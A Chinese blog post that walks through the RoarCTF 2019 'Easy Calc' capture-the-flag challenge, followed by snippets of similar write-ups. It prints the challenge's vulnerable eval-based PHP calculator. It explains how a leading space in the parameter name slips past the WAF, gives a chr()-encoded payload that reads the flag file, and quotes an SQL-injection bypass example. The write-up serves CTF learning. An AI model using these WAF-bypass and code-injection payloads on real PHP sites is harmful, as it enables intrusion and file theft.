[BUUCTF][RoarCTF 2019]Easy Calc

最新推荐文章于 2022-11-11 15:21:54 发布
最新推荐文章于 2022-11-11 15:21:54 发布
阅读量173 收藏
点赞数 3
分类专栏: 刷题记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120713689
版权

[RoarCTF 2019]Easy Calc

考点:php字符解析特性

解析

先查看源码,有一个WAF

 $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })

注意到calc.php

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

可以发现过滤了一堆符号,经过测试,当输入字符时报错,猜测是waf的限制。

PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:

/news.php?%20news[id%00=42"+AND+1=0–

上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

1.删除空白符

2.将某些字符转换为下划线(包括空格)

因为num不可以传入字母,但是我们在num参数之前添加一个空格,这样在PHP的语言特性下会默认删除这个空格,但是WAF会因为这个空格导致检测不到num这个参数,最终导致WAF被绕过。

构造payload

calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

chr():用一个范围在 range(256)内的(就是0~255)整数作参数,返回一个对应的字符,返回值是当前整数对应的 ASCII 字符。例如:print(chr(47))输出结果就是/

Snakin_ya
关注
专栏目录
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 2988
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
BUUCTF[RoarCTF 2019]Easy Calc
楼阁de猫的博客
12-23 158
[RoarCTF 2019]Easy Calc 查看源码 $("#content").val(): 获取id为content的HTML标签元素的值,是JQuery, 发现有calc.php,看看有什么 这里显示了waf的过滤规则 我们上传字符发现都被过滤了,这里考察的是PHP的字符串解析特性 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符 2.将某些字符转换为下划线(包括空格) 利用这个特性,我们就可以在num前面加一个空格,然后就能绕过waf,执行
buuctf_[RoarCTF 2019]Easy Calc
weixin_46107179的博客
08-01 176
叫我们输入表达式,我们随便输入点数据,然后再答案中显示出来,感觉看不出啥来,查看源码 发现.ajax;.ajax是指通过http请求加载远程数据。然后后面发现一个calc.php后面传入一个num参数;尝试看一下这个calc.php页面 发现过滤了一些字符,如果能绕过,就可以用eval执行任意PHP代码;在正则表达式中对每一个黑名单来连接字符串;/m表示多行查找 /i (忽略大小写) /g (全文查找出现的所有匹配字符) /m (多行查找) /gi(全文查找、忽略大小写) /ig(全文查找、忽略大小写) 这
BUUCTF [RoarCTF 2019]Easy Calc
qq_53030229的博客
11-09 842
文章目录一、 [RoarCTF 2019]Easy Calc1、检查源码2、利用PHP的字符串解析绕过 一、 [RoarCTF 2019]Easy Calc 1、检查源码        1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行        2、检查源码,发现了calc.php,打开     
BUUCTF_[RoarCTF 2019]Easy_Calc
qq_45628145的博客
05-01 1329
Easy Calc 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php。 这个代码是先进行一个黑名单判断,然后执行eval()。 过滤了很多字符,而且不能输入num不能是字母,所以我们用%20num进行绕过,利用的是php的字符串解析特性,构...
buuctf [RoarCTF 2019]Easy Calc
qq_1873822的博客
03-07 387
打开题目是一个计算器 查看源码有一个 calc.php 看看题目内容,一个计算器,并且过滤了非数字的值,查看源码,上了waf,并且在calc.php显示waf的规则 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"
BUUCTF-WEB
ccfly1012的博客
11-02 3883
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WriteUp
鱼的博客
02-01 746
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF持续更新中
wo41ge的博客
10-19 496
目录 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (
BUUCTF:[RoarCTF 2019]Easy Calc
末初的CSDN博客
10-19 1246
题目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc 查看源码 抓包发现calc.php 访问http://node3.buuoj.cn:28908/calc.php 很明显,代码执行绕过,前面源码也说了有WAF,这里绕过WAF有两种方法 在num前添加%20绕过对num的检测 HTTP走私之重复Content-Length绕过 首先看下phpinfo(),禁用了一大堆函数 使用scandir()函数+chr()函数绕过.
BUUCTF [RoarCTF 2019] Easy Calc
Senimo
03-29 760
BUUCTF [RoarCTF 2019] Easy Calc Web writeup 启动靶机,打开页面: 一个简单的计算器页面,查看网页源码: 提示设置了WAF以确保安全,尝试访问calc.php: 得到了WAF源码,分析代码: 需要传入变量num的值 设置了一系列黑名单的值 如果传入的变量num中有黑名单包括的符号,将终止程序 否则将输出num的内容 根据PHP的解析规则:如果变量...
BUUCTF [RoarCTF 2019] Easy calc
qq_43039823的博客
07-28 250
Chr("0") 为0的字符 Chr("1") Chr("2") Chr("3") Chr("4") Chr("5") Chr("6") Chr("7") 响铃 Chr("8") 回格 Chr("9") tab(水平制表符) Chr("10") 换行 Chr("11") tab(垂直制表符) Chr("12") 换页 Chr("13") 回车 chr(13)&chr(10) 回车和换行的组合 Chr("14") Chr("15") Chr("16") Chr("17
BUUCTF-web-[RoarCTF 2019]Easy Calc
weixin_44866139的博客
05-15 658
有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num'];
buuctf-[RoarCTF 2019]Easy Calc-个人理解
sunquan705的博客
11-11 296
buuctf-[RoarCTF 2019]Easy Calc-个人理解-有错误的还请各位师傅指出
BUUCTF__[RoarCTF 2019]Easy Calc_题解
风过江南乱的博客
05-11 1054
一、看题 拿到题目 输入发现会显示简单的计算。 想到是不是ssti模板注入。 尝试{{1+1}}报错,行不通。 F12查看源码。发现存在WAF,访问 calc.php 。 尝试访问得到源代码。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r'
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc
weixin_44622228的博客
04-17 413
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc 进入靶场,发现只有一个计算器的页面, 输入1+2看看,返回了答案3 常规想法,输入单引号试试,弹出了一个窗口 经过多个字符测试,发现都会导致弹窗,这时候我们看看F12看看, 有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 注释下还有一段js代码,通过代码可以发现还有个calc.php页面,于是...
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)
小宇的web博客
01-18 747
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解) 打开网页后是这样的。 这里先查看一下源代码 这里显示是有waf的,直接访问一下calc.php来查看。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n
[roarctf 2019]easy calc
最新发布
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值